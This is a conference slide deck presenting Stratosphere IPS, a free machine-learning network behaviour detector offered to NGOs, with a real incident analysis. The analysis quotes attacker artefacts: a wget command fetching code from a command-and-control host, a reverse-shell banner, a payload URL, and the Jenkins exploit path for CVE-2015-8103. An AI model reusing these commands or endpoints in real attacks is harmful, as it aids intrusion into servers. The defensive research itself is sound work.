Stratosphere IPS

The free machine learning malware detection for the community

Sebastian Garcia - CTU University, Prague

@eldracote

sebastian.garcia@agents.fel.cvut.cz

https://stratosphereips.org

Live Slides: bit.ly/ekoparty2016

NGOs are at risk

Problems in NGOs Security

  • Highly political targets.

  • Attacked by powerful actors

  • No resources.

  • Not their goal.

  • Strong concerns about their privacy.

  • Concerns about Trust.

Stratosphere IPS

https://stratosphereips.org/

Free

Software

Machine

Learning

Behavioral

IPS

Protecting

NGOs

Stratosphere Goals

  • To put machine learning techniques in the hands of the civil society.

  • To offer this detection service to NGOs for free.

  • To focus on what computers are doing, not the attacks they receive.

Stratosphere Tech Principles

  • Less is More

    • Analyze the behavior of groups of flows.

  • Disassociate

    • Representation of behavior from detection.

  • Verify

    • With real and labeled datasets.

About Behaviors

  • Your behavior is usually the same when connecting with the same service.

  • Group flows going to a specific service by ignoring the source port. We call it a connection.

  • The connection, composed of several flows, now shows a behavior in time.

Network Behaviors

  • Model network behaviors as a string of letters.

  • 1 flow        3 features         1 letter

Malware Behaviors

  • Malware mostly generate the same behaviors.

  • Changing the behavior is costly for the attacker.

  • These behaviors do not expire quickly.

 

Behavior of Connections

Markov Chains Models

  • Create, train and store a Markov Chain models

Behavioral Detection

Trained

Markov Models

Similarity to Unknown Traffic

Real Detection Example

Example Detection

  • January 18th, 2016.

  • Got an alert from a malicious behavior.

147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]: 88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,

"For a long time there was a periodic connection (freq 5s-60s), to an uncommon port, with large flows of medium duration."

The Detected Connection

Sent: "+.............P.43.249.81.135.......?."
Recv once:  "import time as O000OO0O0O00OO00O"

  • 43.249.81.135

    • No VirusTotal detection.

    • AS58879 Shanghai Anchang Network Security Technology Co.,L. China.

    • Last known domain: lyzqmir2.com. Minecraft server.

The Beginning

  • 103.242.134.118 port 33333/TCP [VT:7]​

    • S:"/bin/sh: 0: can't access tty; job control turned off.$,"

    • S:"tomcat6 17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep abcc.$

    • S:"wget 23.247.5.27:435/abcc.c"

  • 23.247.5.27 port 25000/TCP (main CC)

    • "=...-== Love AV ==-:..Linux 3.2.0-4-amd64"

  • Python Script (Deobfuscated by Veronica Valeros Thx!)

    • "http://222.179.116.23:8080/theme/1/pys.py"

Is it Attacking?

  • Hundreds of connections to IPs in China, port 80/UDP.

  • 115.239.248.88 port 80/UDP [MoveInternet Network Technology Co.,Ltd.,CN]

    • Few Kb of binary data sent.

    • No apparent explanation.

The Attack Conclusion

  • Strange POSTs to Jenkins minutes before

    • POST /jenkins/descriptor/hudson.model.DownloadService/...

  • Remote Jenkins code execution vulnerability CVE-2015-8103. Metasploit module.

  • C&C channel with 10s timeouts.

  • ​Receives orders and executes OS commands

  • Function to send random UDP data to IPs.

  • Similar to BillGates botnet, not quite.

What to do with this?Stratosphere Data Analysis Service

Stratosphere Data Analysis

  • Cloud-based detection service for NGOs.

  • Add new algorithms continually.

  • Update the models.

  • Verify the detections if necessary.

 

  • We sign NDAs, NGOs can send the Flows or only the letters! Privacy matters.

New Algorithms

  • Anomaly Detection

    • New feature in behavioral letters.

  • Malicious HTTPs detection.

  • Graph Analysis of sequential connections.

  • WHOIS similarity grouping.

  • P2P behavior

  • Behavioral Patterns of the Host.

Example of Graph Analysis

Organizations working with us

  • People In Need. CZ. Helping 22 countries. Human-rights, war, etc.

  • CZ.NIC. Manager of .cz and Turris Project. 2,000 Internet Networks.

  • ICT help for policy makers in 20 African Countries

  • CTU University. With more than 7,000 hosts.

Want to help NGOs?

  • Are you researching in network security?

  • Like network security analysis?

  • Know NGOs that are are risk in Latin America? Suggest them to us.

  • Know activists or journalists under attack? Tell us.

  • We are already working with researchers in Argentina. Help the project.

Conclusion

  • NGOs need our help.

  • Trust and openness is essential.

  • Continuous visibility and analysis is paramount.

  • Behavioral Machine Learning is improving.

Questions? And Thanks!

Sebastian Garcia 

eldraco@gmail.com

sebastian.garcia@agents.fel.cvut.cz

@eldracote

Stratosphere IPS. The free machine learning malware detection for the community

By eldraco

Stratosphere IPS. The free machine learning malware detection for the community

Stratosphere IPS. The free IPS for NGOs.

  • 2,360

More from eldraco